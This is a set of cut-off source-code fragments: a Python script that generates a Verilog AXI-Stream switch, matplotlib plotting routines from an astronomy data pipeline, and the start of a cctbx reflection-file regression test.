parser.add_argument('-p', '--ports', type=int, default=[4], nargs='+', help="number of ports")
parser.add_argument('-n', '--name', type=str, help="module name")
parser.add_argument('-o', '--output', type=str, help="output file name")
args = parser.parse_args()
try:
generate(**args.__dict__)
except IOError as ex:
print(ex)
exit(1)
def generate(ports=4, name=None, output=None):
if type(ports) is int:
m = n = ports
elif len(ports) == 1:
m = n = ports[0]
else:
m, n = ports
if name is None:
name = "axis_switch_64_{0}x{1}".format(m, n)
if output is None:
output = name + ".v"
print("Opening file '{0}'...".format(output))
output_file = open(output, 'w')
print("Generating {0}x{1} port AXI Stream switch {2}...".format(m, n, name))
cm = int(math.ceil(math.log(m, 2)))
cn = int(math.ceil(math.log(n, 2)))
t = Template(u"""/*
Copyright (c) 2016-2017 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
*/
// Language: Verilog 2001
`timescale 1ns / 1ps
/*
* AXI4-Stream {{m}}x{{n}} switch (64 bit datapath)
*/
module {{name}} #
(
parameter DATA_WIDTH = 64,
parameter KEEP_WIDTH = (DATA_WIDTH/8),
parameter DEST_WIDTH = {{cn}},
{%- for p in range(n) %}
parameter OUT_{{p}}_BASE = {{p}},
parameter OUT_{{p}}_TOP = {{p}},
parameter OUT_{{p}}_CONNECT = {{m}}'b{% for p in range(m) %}1{% endfor %},
{%- endfor %}
// arbitration type: "PRIORITY" or "ROUND_ROBIN"
parameter ARB_TYPE = "ROUND_ROBIN",
// LSB priority: "LOW", "HIGH"
parameter LSB_PRIORITY = "HIGH"
)
(
input wire clk,
input wire rst,
/*
* AXI Stream inputs
*/
{%- for p in range(m) %}
input wire [DATA_WIDTH-1:0] input_{{p}}_axis_tdata,
input wire [KEEP_WIDTH-1:0] input_{{p}}_axis_tkeep,
input wire input_{{p}}_axis_tvalid,
output wire input_{{p}}_axis_tready,
input wire input_{{p}}_axis_tlast,
input wire [DEST_WIDTH-1:0] input_{{p}}_axis_tdest,
input wire input_{{p}}_axis_tuser,
{% endfor %}
/*
* AXI Stream outputs
*/
{%- for p in range(n) %}
output wire [DATA_WIDTH-1:0] output_{{p}}_axis_tdata,
output wire [KEEP_WIDTH-1:0] output_{{p}}_axis_tkeep,
output wire output_{{p}}_axis_tvalid,
input wire output_{{p}}_axis_tready,
output wire output_{{p}}_axis_tlast,
output wire [DEST_WIDTH-1:0] output_{{p}}_axis_tdest,
output wire output_{{p}}_axis_tuser{% if not loop.last %},{% endif %}
{% endfor -%}
);
// check configuration
initial begin
if (2**DEST_WIDTH < {{n}}) begin
$error("Error: DEST_WIDTH too small for port count");
$finish;
end
if ({%- for p in range(n) %}(OUT_{{p}}_BASE & 2**DEST_WIDTH-1) != OUT_{{p}}_BASE || (OUT_{{p}}_TOP & 2**DEST_WIDTH-1) != OUT_{{p}}_TOP{% if not loop.last %} ||
{% endif %}{% endfor -%}) begin
$error("Error: value out of range");
$finish;
end
if ({%- for p in range(n) %}OUT_{{p}}_BASE > OUT_{{p}}_TOP{% if not loop.last %} ||
{% endif %}{% endfor -%}) begin
$error("Error: invalid range");
$finish;
end
if ({%- for p in range(n-1) %}{% set outer_loop = loop %}{%- for q in range(p+1,n) %}(OUT_{{p}}_BASE <= OUT_{{q}}_TOP && OUT_{{q}}_BASE <= OUT_{{p}}_TOP){% if not (loop.last and outer_loop.last) %} ||
{% endif %}{% endfor -%}{% endfor -%}) begin
$error("Error: ranges overlap");
$finish;
end
end
{%- for p in range(m) %}
reg [{{n-1}}:0] input_{{p}}_request_reg = {{n}}'d0, input_{{p}}_request_next;
reg input_{{p}}_request_valid_reg = 1'b0, input_{{p}}_request_valid_next;
reg input_{{p}}_request_error_reg = 1'b0, input_{{p}}_request_error_next;
{%- endfor %}
{% for p in range(n) %}
reg [{{cm-1}}:0] select_{{p}}_reg = {{cm}}'d0, select_{{p}}_next;
{%- endfor %}
{% for p in range(n) %}
reg enable_{{p}}_reg = 1'b0, enable_{{p}}_next;
{%- endfor %}
{% for p in range(m) %}
reg input_{{p}}_axis_tready_reg = 1'b0, input_{{p}}_axis_tready_next;
{%- endfor %}
// internal datapath
{%- for p in range(n) %}
reg [DATA_WIDTH-1:0] output_{{p}}_axis_tdata_int;
reg [KEEP_WIDTH-1:0] output_{{p}}_axis_tkeep_int;
reg output_{{p}}_axis_tvalid_int;
reg output_{{p}}_axis_tready_int_reg = 1'b0;
reg output_{{p}}_axis_tlast_int;
reg [DEST_WIDTH-1:0] output_{{p}}_axis_tdest_int;
reg output_{{p}}_axis_tuser_int;
wire output_{{p}}_axis_tready_int_early;
{% endfor %}
{%- for p in range(m) %}
assign input_{{p}}_axis_tready = input_{{p}}_axis_tready_reg;
{%- endfor %}
// mux for incoming packet
{% for p in range(n) %}
reg [DATA_WIDTH-1:0] current_input_{{p}}_axis_tdata;
reg [KEEP_WIDTH-1:0] current_input_{{p}}_axis_tkeep;
reg current_input_{{p}}_axis_tvalid;
reg current_input_{{p}}_axis_tready;
reg current_input_{{p}}_axis_tlast;
reg [DEST_WIDTH-1:0] current_input_{{p}}_axis_tdest;
reg current_input_{{p}}_axis_tuser;
always @* begin
case (select_{{p}}_reg)
{%- for q in range(m) %}
{{cm}}'d{{q}}: begin
current_input_{{p}}_axis_tdata = input_{{q}}_axis_tdata;
current_input_{{p}}_axis_tkeep = input_{{q}}_axis_tkeep;
current_input_{{p}}_axis_tvalid = input_{{q}}_axis_tvalid;
current_input_{{p}}_axis_tready = input_{{q}}_axis_tready;
current_input_{{p}}_axis_tlast = input_{{q}}_axis_tlast;
current_input_{{p}}_axis_tdest = input_{{q}}_axis_tdest;
current_input_{{p}}_axis_tuser = input_{{q}}_axis_tuser;
end
{%- endfor %}
default: begin
current_input_{{p}}_axis_tdata = {DATA_WIDTH{1'b0}};
current_input_{{p}}_axis_tkeep = {KEEP_WIDTH{1'b0}};
current_input_{{p}}_axis_tvalid = 1'b0;
current_input_{{p}}_axis_tready = 1'b0;
current_input_{{p}}_axis_tlast = 1'b0;
current_input_{{p}}_axis_tdest = {DEST_WIDTH{1'b0}};
current_input_{{p}}_axis_tuser = 1'b0;
end
endcase
end
{% endfor %}
// arbiter instances
{% for p in range(n) %}
wire [{{m-1}}:0] request_{{p}};
wire [{{m-1}}:0] acknowledge_{{p}};
wire [{{m-1}}:0] grant_{{p}};
wire grant_valid_{{p}};
wire [{{cm-1}}:0] grant_encoded_{{p}};
{% endfor %}
{%- for p in range(n) %}
arbiter #(
.PORTS({{m}}),
.TYPE(ARB_TYPE),
.BLOCK("ACKNOWLEDGE"),
.LSB_PRIORITY(LSB_PRIORITY)
)
arb_{{p}}_inst (
.clk(clk),
.rst(rst),
.request(request_{{p}}),
.acknowledge(acknowledge_{{p}}),
.grant(grant_{{p}}),
.grant_valid(grant_valid_{{p}}),
.grant_encoded(grant_encoded_{{p}})
);
{% endfor %}
// request generation
{%- for p in range(n) %}
{%- for q in range(m) %}
assign request_{{p}}[{{q}}] = input_{{q}}_request_reg[{{p}}] & ~acknowledge_{{p}}[{{q}}];
{%- endfor %}
{% endfor %}
// acknowledge generation
{%- for p in range(n) %}
{%- for q in range(m) %}
assign acknowledge_{{p}}[{{q}}] = grant_{{p}}[{{q}}] & input_{{q}}_axis_tvalid & input_{{q}}_axis_tready & input_{{q}}_axis_tlast;
{%- endfor %}
{% endfor %}
always @* begin
{%- for p in range(n) %}
select_{{p}}_next = select_{{p}}_reg;
{%- endfor %}
{% for p in range(n) %}
enable_{{p}}_next = enable_{{p}}_reg;
{%- endfor %}
{% for p in range(m) %}
input_{{p}}_request_next = input_{{p}}_request_reg;
input_{{p}}_request_valid_next = input_{{p}}_request_valid_reg;
input_{{p}}_request_error_next = input_{{p}}_request_error_reg;
{% endfor %}
{%- for p in range(m) %}
input_{{p}}_axis_tready_next = 1'b0;
{%- endfor %}
{% for p in range(n) %}
output_{{p}}_axis_tdata_int = {DATA_WIDTH{1'b0}};
output_{{p}}_axis_tkeep_int = {DATA_WIDTH{1'b0}};
output_{{p}}_axis_tvalid_int = 1'b0;
output_{{p}}_axis_tlast_int = 1'b0;
output_{{p}}_axis_tdest_int = {DEST_WIDTH{1'b0}};
output_{{p}}_axis_tuser_int = 1'b0;
{% endfor %}
// input decoding
{% for p in range(m) %}
if (input_{{p}}_request_valid_reg | input_{{p}}_request_error_reg) begin
if (input_{{p}}_axis_tvalid & input_{{p}}_axis_tready & input_{{p}}_axis_tlast) begin
input_{{p}}_request_next = {DEST_WIDTH{1'b0}};
input_{{p}}_request_valid_next = 1'b0;
input_{{p}}_request_error_next = 1'b0;
end
end else if (input_{{p}}_axis_tvalid) begin
{%- for q in range(n) %}
input_{{p}}_request_next[{{q}}] = (input_{{p}}_axis_tdest >= OUT_{{q}}_BASE) & (input_{{p}}_axis_tdest <= OUT_{{q}}_TOP) & OUT_{{q}}_CONNECT[{{p}}];
{%- endfor %}
if (input_{{p}}_request_next) begin
input_{{p}}_request_valid_next = 1'b1;
end else begin
input_{{p}}_request_error_next = 1'b1;
end
end
{% endfor %}
// output control
{% for p in range(n) %}
if (current_input_{{p}}_axis_tvalid & current_input_{{p}}_axis_tready) begin
if (current_input_{{p}}_axis_tlast) begin
enable_{{p}}_next = 1'b0;
end
end
if (~enable_{{p}}_reg & grant_valid_{{p}}) begin
enable_{{p}}_next = 1'b1;
select_{{p}}_next = grant_encoded_{{p}};
end
{% endfor %}
// generate ready signal on selected port
{% for p in range(n) %}
if (enable_{{p}}_next) begin
case (select_{{p}}_next)
{%- for q in range(m) %}
{{cm}}'d{{q}}: input_{{q}}_axis_tready_next = output_{{p}}_axis_tready_int_early;
{%- endfor %}
endcase
end
{% endfor %}
{%- for p in range(m) %}
if (input_{{p}}_request_error_next)
input_{{p}}_axis_tready_next = 1'b1;
{%- endfor %}
// pass through selected packet data
{% for p in range(n) %}
output_{{p}}_axis_tdata_int = current_input_{{p}}_axis_tdata;
output_{{p}}_axis_tkeep_int = current_input_{{p}}_axis_tkeep;
output_{{p}}_axis_tvalid_int = current_input_{{p}}_axis_tvalid & current_input_{{p}}_axis_tready & enable_{{p}}_reg;
output_{{p}}_axis_tlast_int = current_input_{{p}}_axis_tlast;
output_{{p}}_axis_tdest_int = current_input_{{p}}_axis_tdest;
output_{{p}}_axis_tuser_int = current_input_{{p}}_axis_tuser;
{% endfor -%}
end
always @(posedge clk) begin
if (rst) begin
{%- for p in range(m) %}
input_{{p}}_request_reg <= {{n}}'d0;
input_{{p}}_request_valid_reg <= 1'b0;
input_{{p}}_request_error_reg <= 1'b0;
{%- endfor %}
{%- for p in range(n) %}
select_{{p}}_reg <= 2'd0;
{%- endfor %}
{%- for p in range(n) %}
enable_{{p}}_reg <= 1'b0;
{%- endfor %}
{%- for p in range(m) %}
input_{{p}}_axis_tready_reg <= 1'b0;
{%- endfor %}
end else begin
{%- for p in range(m) %}
input_{{p}}_request_reg <= input_{{p}}_request_next;
input_{{p}}_request_valid_reg <= input_{{p}}_request_valid_next;
input_{{p}}_request_error_reg <= input_{{p}}_request_error_next;
{%- endfor %}
{%- for p in range(n) %}
select_{{p}}_reg <= select_{{p}}_next;
{%- endfor %}
{%- for p in range(n) %}
enable_{{p}}_reg <= enable_{{p}}_next;
{%- endfor %}
{%- for p in range(m) %}
input_{{p}}_axis_tready_reg <= input_{{p}}_axis_tready_next;
{%- endfor %}
end
end
{% for p in range(n) %}
// output {{p}} datapath logic
reg [DATA_WIDTH-1:0] output_{{p}}_axis_tdata_reg = {DATA_WIDTH{1'b0}};
reg [KEEP_WIDTH-1:0] output_{{p}}_axis_tkeep_reg = {KEEP_WIDTH{1'b0}};
reg output_{{p}}_axis_tvalid_reg = 1'b0, output_{{p}}_axis_tvalid_next;
reg output_{{p}}_axis_tlast_reg = 1'b0;
reg [DEST_WIDTH-1:0] output_{{p}}_axis_tdest_reg = {DEST_WIDTH{1'b0}};
reg output_{{p}}_axis_tuser_reg = 1'b0;
reg [DATA_WIDTH-1:0] temp_{{p}}_axis_tdata_reg = {DATA_WIDTH{1'b0}};
reg [KEEP_WIDTH-1:0] temp_{{p}}_axis_tkeep_reg = {KEEP_WIDTH{1'b0}};
reg temp_{{p}}_axis_tvalid_reg = 1'b0, temp_{{p}}_axis_tvalid_next;
reg temp_{{p}}_axis_tlast_reg = 1'b0;
reg [DEST_WIDTH-1:0] temp_{{p}}_axis_tdest_reg = {DEST_WIDTH{1'b0}};
reg temp_{{p}}_axis_tuser_reg = 1'b0;
// datapath control
reg store_{{p}}_axis_int_to_output;
reg store_{{p}}_axis_int_to_temp;
reg store_{{p}}_axis_temp_to_output;
assign output_{{p}}_axis_tdata = output_{{p}}_axis_tdata_reg;
assign output_{{p}}_axis_tkeep = output_{{p}}_axis_tkeep_reg;
assign output_{{p}}_axis_tvalid = output_{{p}}_axis_tvalid_reg;
assign output_{{p}}_axis_tlast = output_{{p}}_axis_tlast_reg;
assign output_{{p}}_axis_tdest = output_{{p}}_axis_tdest_reg;
assign output_{{p}}_axis_tuser = output_{{p}}_axis_tuser_reg;
// enable ready input next cycle if output is ready or the temp reg will not be filled on the next cycle (output reg empty or no input)
assign output_{{p}}_axis_tready_int_early = output_{{p}}_axis_tready | (~temp_{{p}}_axis_tvalid_reg & (~output_{{p}}_axis_tvalid_reg | ~output_{{p}}_axis_tvalid_int));
always @* begin
// transfer sink ready | |
# get limits for zooms
xmin, xmax = xzoom1[row], xzoom2[row]
ymin, ymax = yzoom1[row], yzoom2[row]
# get image zoom
image_zoom = image[ymin:ymax, xmin:xmax]
# threshold = percentile
threshold = np.nanpercentile(image_zoom, 95)
# ------------------------------------------------------------------
# plot image
im = frame.imshow(image_zoom, origin='lower', vmin=0.0, vmax=threshold,
cmap='gist_gray', aspect='auto',
extent=[xmin, xmax, ymin, ymax])
# loop around xarr and yarr and plot
for order_num in range(len(xarr)):
# x and y
x, y = xarr[order_num], yarr[order_num]
# get ypix
ypix = np.polyval(coeffs[order_num][::-1], xpix)
# plot full fit
frame.plot(xpix, ypix, linewidth=1, color='blue', ls='--', zorder=1)
# plot valid fit
frame.plot(x, y, linewidth=1, color='red', zorder=2)
# set the limits
frame.set(xlim=(xmin, xmax), ylim=(ymin, ymax))
# create an axes on the right side of ax. The width of cax will be 5%
# of ax and the padding between cax and ax will be fixed at 0.05 inch.
divider = axes_grid1.make_axes_locatable(frame)
cax = divider.append_axes("top", size="5%", pad=0.05)
cb = plt.colorbar(im, cax=cax, orientation='horizontal')
cb.ax.xaxis.set_ticks_position('top')
# adjust plot
plt.subplots_adjust(top=0.95, bottom=0.05, left=0.075, right=0.925)
# ------------------------------------------------------------------
# wrap up using plotter
plotter.plotend(graph)
def plot_loc_check_coeffs(plotter, graph, kwargs):
# ------------------------------------------------------------------
# start the plotting process
if not plotter.plotstart(graph):
return
plt = plotter.plt
# ------------------------------------------------------------------
# get the arguments from kwargs
good_arr = kwargs['good']
xpix = kwargs['xpix']
ypix = kwargs['ypix']
ypix0 = kwargs['ypix0']
image = kwargs['image']
order = kwargs.get('order', None)
kind = kwargs.get('kind', None)
# ------------------------------------------------------------------
# get order generator
# ------------------------------------------------------------------
if order is None:
order_gen = plotter.plotloop(np.arange(len(good_arr)))
# prompt to start looper
plotter.close_plots(loop=True)
# else we just deal with the order specified
else:
order_gen = [order]
# ------------------------------------------------------------------
# loop around orders
for order_num in order_gen:
# get this iterations values
good = good_arr[order_num]
ypixgo = ypix[order_num, good]
ypix0go = ypix0[order_num, good]
residual = ypixgo - ypix0go
# get the y limits
ymax = np.ceil(np.nanmax([np.nanmax(ypixgo), np.nanmax(ypix0go)]))
ymin = np.floor(np.nanmin([np.nanmin(ypixgo), np.nanmin(ypix0go)]))
ydiff = np.ceil(ymax - ymin)
ymax = np.min([int(ymax + 0.25 * ydiff), image.shape[0]])
ymin = np.max([int(ymin - 0.25 * ydiff), 0])
# mask the image between y limits
imagezoom = image[ymin:ymax]
# normalise zoom image
imagezoom = imagezoom / np.nanpercentile(imagezoom, 85)
# ------------------------------------------------------------------
# set up plot
if kind == 'center':
fig, frames = graph.set_figure(plotter, nrows=2, ncols=1,
sharex=True)
frame1, frame2 = frames
else:
fig, frame2 = graph.set_figure(plotter, nrows=1, ncols=1)
frame1 = None
# ------------------------------------------------------------------
# plot the image fits (if we are dealing with a center plot)
if kind == 'center':
frame1.imshow(imagezoom, aspect='auto', origin='lower', zorder=0,
cmap='gist_gray', vmin=0, vmax=1,
extent=[0, image.shape[1], ymin, ymax])
frame1.plot(xpix[good], ypix0go, color='b', ls='--', label='old',
zorder=2)
frame1.plot(xpix[good], ypixgo, color='r', ls='-', label='new',
zorder=1)
frame1.legend(loc=0)
# force x limits
frame1.set_xlim(0, image.shape[1])
# ------------------------------------------------------------------
# plot the residuals
frame2.plot(xpix[good], residual, marker='x')
# add legend
frame2.legend(loc=0)
# force x limits
frame2.set_xlim(0, image.shape[1])
# ------------------------------------------------------------------
# construct frame title
if kind is None:
title = 'Coefficient Residuals (New - Original) Order={1}'
else:
title = '{0} coefficient residuals (New - Original) Order={1}'
# ------------------------------------------------------------------
# set title and labels
if kind == 'center':
frame1.set(title=title.format(kind, order_num),
ylabel='y pixel position')
frame2.set(xlabel='x pixel position',
ylabel=r'$\Delta$y pixel position')
else:
frame2.set(title=title.format(kind, order_num),
xlabel='x pixel position',
ylabel=r'$\Delta$y pixel position')
# ------------------------------------------------------------------
# adjust plot
plt.subplots_adjust(top=0.925, bottom=0.125, left=0.1, right=0.975,
hspace=0.05)
# ------------------------------------------------------------------
# update filename (adding order_num to end)
suffix = 'order{0}'.format(order_num)
graph.set_filename(plotter.params, plotter.location, suffix=suffix)
# ------------------------------------------------------------------
# wrap up using plotter
plotter.plotend(graph)
# define graphing instances
loc_minmax_cents = Graph('LOC_MINMAX_CENTS', kind='debug',
func=plot_loc_minmax_cents)
loc_min_cents_thres = Graph('LOC_MIN_CENTS_THRES', kind='debug',
func=plot_loc_min_cents_thres)
loc_finding_orders = Graph('LOC_FINDING_ORDERS', kind='debug',
func=plot_loc_finding_orders)
loc_im_sat_thres = Graph('LOC_IM_SAT_THRES', kind='debug',
func=plot_loc_im_sat_thres)
loc_fit_residuals = Graph('LOC_FIT_RESIDUALS', kind='debug',
func=plot_loc_fit_residuals)
loc_ord_vs_rms = Graph('LOC_ORD_VS_RMS', kind='debug',
func=plot_loc_ord_vs_rms)
loc_check_coeffs = Graph('LOC_CHECK_COEFFS', kind='debug',
func=plot_loc_check_coeffs)
sum_desc = ('Polynomial fits for localisation (overplotted on '
'pre-processed image)')
sum_loc_im_sat_thres = Graph('SUM_LOC_IM_THRES', kind='summary',
func=plot_loc_im_sat_thres, figsize=(12, 8),
dpi=300, description=sum_desc)
sum_desc = ('Zoom in polynomial fits for localisation (overplotted on '
'pre-processed image)')
sum_plot_loc_im_corner = Graph('SUM_LOC_IM_CORNER', kind='summary',
func=plot_loc_im_corner, figsize=(16, 10),
dpi=150, description=sum_desc)
# add to definitions
definitions += [loc_minmax_cents, loc_min_cents_thres, loc_finding_orders,
loc_im_sat_thres, loc_ord_vs_rms, loc_check_coeffs,
loc_fit_residuals,
sum_loc_im_sat_thres, sum_plot_loc_im_corner]
# =============================================================================
# Define shape plotting functions
# =============================================================================
def plot_shape_dx(plotter, graph, kwargs):
# ------------------------------------------------------------------
# start the plotting process
if not plotter.plotstart(graph):
return
plt = plotter.plt
axes_grid1 = plotter.axes_grid1
# ------------------------------------------------------------------
# get the arguments from kwargs
dx = kwargs['dx']
dx2 = kwargs['dx2']
bnum = kwargs['bnum']
nbanana = kwargs['nbanana']
# set the zeropoint
zeropoint = np.nanmedian(dx)
# get the sig of dx
sig_dx = np.nanmedian(np.abs(dx - zeropoint))
# ------------------------------------------------------------------
# set up plot
fig, frames = graph.set_figure(plotter, ncols=3, nrows=1)
# set up axis
frame1, frame2, frame3 = frames
# ----------------------------------------------------------------------
# plot dx
vmin = (-2 * sig_dx) + zeropoint
vmax = (2 * sig_dx) + zeropoint
im1 = frame1.imshow(dx, vmin=vmin, vmax=vmax, cmap='viridis')
# add colour bar
divider1 = axes_grid1.make_axes_locatable(frame1)
cax1 = divider1.append_axes("top", size="10%", pad=0.05)
cb1 = plt.colorbar(im1, cax=cax1, orientation='horizontal')
# set colorbar tick positions and label
cb1.ax.xaxis.set_ticks_position('top')
cb1.ax.xaxis.set_label_position('top')
cb1.set_label('dx')
# set labels and title
frame1.set(xlabel='width [pix]', ylabel='order number', title='dx')
# ----------------------------------------------------------------------
# plot dx2
vmin = (-2 * sig_dx) + zeropoint
vmax = (2 * sig_dx) + zeropoint
im2 = frame2.imshow(dx2, vmin=vmin, vmax=vmax, cmap='viridis')
# add colour bar
divider2 = axes_grid1.make_axes_locatable(frame2)
cax2 = divider2.append_axes("top", size="10%", pad=0.05)
cb2 = plt.colorbar(im2, cax=cax2, orientation='horizontal')
# set colorbar tick positions and label
cb2.ax.xaxis.set_ticks_position('top')
cb2.ax.xaxis.set_label_position('top')
cb2.set_label('dx2')
# set labels and title
frame2.set(xlabel='width [pix]', ylabel='order number', title='dx2')
# ----------------------------------------------------------------------
# plot diff
vmin = (-0.5 * sig_dx) + zeropoint
vmax = (0.5 * sig_dx) + zeropoint
im3 = frame3.imshow(dx - dx2, vmin=vmin, vmax=vmax, cmap='viridis')
# add colour bar
divider3 = axes_grid1.make_axes_locatable(frame3)
cax3 = divider3.append_axes("top", size="10%", pad=0.05)
cb3 = plt.colorbar(im3, cax=cax3, orientation='horizontal')
# set colorbar tick positions and label
cb3.ax.xaxis.set_ticks_position('top')
cb3.ax.xaxis.set_label_position('top')
cb3.set_label('dx - dx2')
# set labels and title
frame3.set(xlabel='width [pix]', ylabel='order number', title='dx - dx2')
# ----------------------------------------------------------------------
# title
# ----------------------------------------------------------------------
plt.suptitle('Iteration {0} / {1}'.format(bnum + 1, nbanana))
# ------------------------------------------------------------------
# wrap up using plotter
plotter.plotend(graph)
def plot_shape_linear_tparams(plotter, graph, kwargs):
# ------------------------------------------------------------------
# start the plotting process
if not plotter.plotstart(graph):
return
plt = plotter.plt
# ------------------------------------------------------------------
# get the arguments from kwargs
image = kwargs['image']
x1 = kwargs['x1']
x2 = kwargs['x2']
y1 = kwargs['y1']
y2 = kwargs['y2']
# ------------------------------------------------------------------
# get image shape
dim1, dim2 = image.shape
# get calculated parameters
diffx = x1 - x2
diffy = y1 - y2
xrange1 = [0, dim2]
xrange2 = [0, dim1]
ylim = np.max([np.nanmedian(np.abs(diffx)), np.nanmedian(np.abs(diffy))])
yrange = [-10 * ylim, 10 * ylim]
nbins = 50
pstep = 100
# ------------------------------------------------------------------
# set up plot
fig, frames = graph.set_figure(plotter, ncols=2, nrows=2)
# set up mean points plot
mkwargs = dict(color='w', linestyle='None', marker='.')
# ----------------------------------------------------------------------
# plot[0,0] x1 vs x1 - x2
# ----------------------------------------------------------------------
frames[0, 0].hist2d(x1, diffx, bins=nbins, range=[xrange1, yrange])
frames[0, 0].set(xlabel='x1', ylabel='x1 - x2')
# calculate bin mean
for pbin in range(0, dim2, pstep):
with warnings.catch_warnings(record=True) as _:
keep = np.abs(x1 - pbin < nbins)
nanmed = mp.nanmedian(diffx[keep])
if np.sum(keep) > 100:
frames[0, 0].plot([pbin], nanmed, **mkwargs)
# ----------------------------------------------------------------------
# plot[0,1] y1 vs x1 - x2
# ----------------------------------------------------------------------
frames[0, 1].hist2d(y1, diffx, bins=nbins, range=[xrange2, yrange])
frames[0, 1].set(xlabel='y1', ylabel='x1 - x2')
# calculate bin mean
for pbin in range(0, dim2, pstep):
with warnings.catch_warnings(record=True) as _:
keep = np.abs(y1 - pbin < nbins)
nanmed = mp.nanmedian(diffx[keep])
if np.sum(keep) > 100:
frames[0, 0].plot([pbin], nanmed, **mkwargs)
# ----------------------------------------------------------------------
# plot[1,0] x1 vs y1 - y2
# ----------------------------------------------------------------------
frames[1, 0].hist2d(x1, diffy, bins=nbins, range=[xrange1, yrange])
frames[1, 0].set(xlabel='x1', ylabel='y1 - y2')
# calculate bin mean
for pbin in range(0, dim2, pstep):
with warnings.catch_warnings(record=True) as _:
keep = np.abs(x1 - pbin < nbins)
nanmed = mp.nanmedian(diffy[keep])
if np.sum(keep) > 100:
frames[0, 0].plot([pbin], nanmed, **mkwargs)
# ----------------------------------------------------------------------
# plot[1,1] y1 vs y1 - y2
# ----------------------------------------------------------------------
frames[1, 1].hist2d(y1, diffy, bins=nbins, range=[xrange2, yrange])
frames[1, 1].set(xlabel='y1', ylabel='y1 - y2')
# calculate bin mean
for pbin in range(0, dim2, pstep):
with warnings.catch_warnings(record=True) as _:
keep = np.abs(y1 - pbin < nbins)
nanmed = mp.nanmedian(diffy[keep])
if np.sum(keep) > 100:
frames[0, 0].plot([pbin], nanmed, **mkwargs)
# ----------------------------------------------------------------------
# title
# ----------------------------------------------------------------------
plt.suptitle('Linear transform parameters')
# ------------------------------------------------------------------
# wrap up using plotter
plotter.plotend(graph)
def plot_shape_angle_offset(plotter, graph, kwargs):
# ------------------------------------------------------------------
# start the plotting process
if not plotter.plotstart(graph):
return
# get plt
plt = plotter.plt
# ------------------------------------------------------------------
# get the arguments from kwargs
params = kwargs['params']
| |
<reponame>dperl-sol/cctbx_project<filename>iotbx/regression/tst_reflection_file_utils.py
from __future__ import absolute_import, division, print_function
import libtbx.load_env
from six.moves import range
if (libtbx.env.has_module("ccp4io")):
from iotbx import reflection_file_reader
from iotbx.reflection_file_utils import reflection_file_server, \
guess_r_free_flag_value
from iotbx import mtz
else:
mtz = None
from cctbx import miller
from cctbx import crystal
from cctbx.array_family import flex
from libtbx.test_utils import Exception_expected, show_diff
from libtbx.utils import Sorry, null_out
from six.moves import cStringIO as StringIO
import os
def exercise_get_amplitudes_and_get_phases_deg():
crystal_symmetry = crystal.symmetry(
unit_cell=(10,11,12,85,95,100),
space_group_symbol="P 1")
miller_set = miller.build_set(
crystal_symmetry=crystal_symmetry,
anomalous_flag=False,
d_min=3)
input_arrays = [miller_set.array(
data=flex.random_double(size=miller_set.indices().size()))
.set_observation_type_xray_amplitude()
for i in [0,1]]
mtz_dataset = input_arrays[0].as_mtz_dataset(column_root_label="F0")
mtz_dataset.mtz_object().write("tmp_rfu1.mtz")
reflection_files = [reflection_file_reader.any_reflection_file(
file_name="tmp_rfu1.mtz")]
reflection_file_srv = reflection_file_server(
crystal_symmetry=crystal_symmetry,
force_symmetry=True,
reflection_files=reflection_files)
ampl = reflection_file_srv.get_amplitudes(
file_name=None,
labels=None,
convert_to_amplitudes_if_necessary=True,
parameter_scope="amplitudes",
parameter_name="labels")
assert str(ampl.info()) == "tmp_rfu1.mtz:F0"
ampl = reflection_file_srv.get_miller_array(labels="F0")
assert str(ampl.info()) == "tmp_rfu1.mtz:F0"
mtz_dataset.add_miller_array(
miller_array=input_arrays[1], column_root_label="F1")
mtz_dataset.mtz_object().write("tmp_rfu2.mtz")
reflection_files = [reflection_file_reader.any_reflection_file(
file_name="tmp_rfu2.mtz")]
err = StringIO()
reflection_file_srv = reflection_file_server(
crystal_symmetry=crystal_symmetry,
force_symmetry=True,
reflection_files=reflection_files,
err=err)
try:
reflection_file_srv.get_amplitudes(
file_name=None,
labels=None,
convert_to_amplitudes_if_necessary=True,
parameter_scope="amplitudes",
parameter_name="labels")
except Sorry:
assert not show_diff(err.getvalue(), """\
Multiple equally suitable arrays of amplitudes found.
Possible choices:
tmp_rfu2.mtz:F0
tmp_rfu2.mtz:F1
Please use amplitudes.labels
to specify an unambiguous substring of the target label.
""")
err = reflection_file_srv.err = StringIO()
else:
raise Exception_expected
ampl = reflection_file_srv.get_amplitudes(
file_name=None,
labels=["F1"],
convert_to_amplitudes_if_necessary=True,
parameter_scope="amplitudes",
parameter_name="labels")
assert str(ampl.info()) == "tmp_rfu2.mtz:F1"
try:
reflection_file_srv.get_amplitudes(
file_name=None,
labels=["F2"],
convert_to_amplitudes_if_necessary=True,
parameter_name="labels",
parameter_scope=None)
except Sorry:
assert not show_diff(err.getvalue(), """\
No matching array: labels=F2
Possible choices:
tmp_rfu2.mtz:F0
tmp_rfu2.mtz:F1
Please use labels
to specify an unambiguous substring of the target label.
""")
err = reflection_file_srv.err = StringIO()
else:
raise Exception_expected
assert len(reflection_file_srv.file_name_miller_arrays) == 1
ampl = reflection_file_srv.get_amplitudes(
file_name="tmp_rfu1.mtz",
labels=None,
convert_to_amplitudes_if_necessary=True,
parameter_scope="amplitudes",
parameter_name="labels")
assert len(reflection_file_srv.file_name_miller_arrays) == 2
assert str(ampl.info()) == "tmp_rfu1.mtz:F0"
ampl = reflection_file_srv.get_amplitudes(
file_name=os.path.abspath("tmp_rfu1.mtz"),
labels=["f0"],
convert_to_amplitudes_if_necessary=True,
parameter_scope="amplitudes",
parameter_name="labels")
assert len(reflection_file_srv.file_name_miller_arrays) == 2
assert str(ampl.info()) == "tmp_rfu1.mtz:F0"
try:
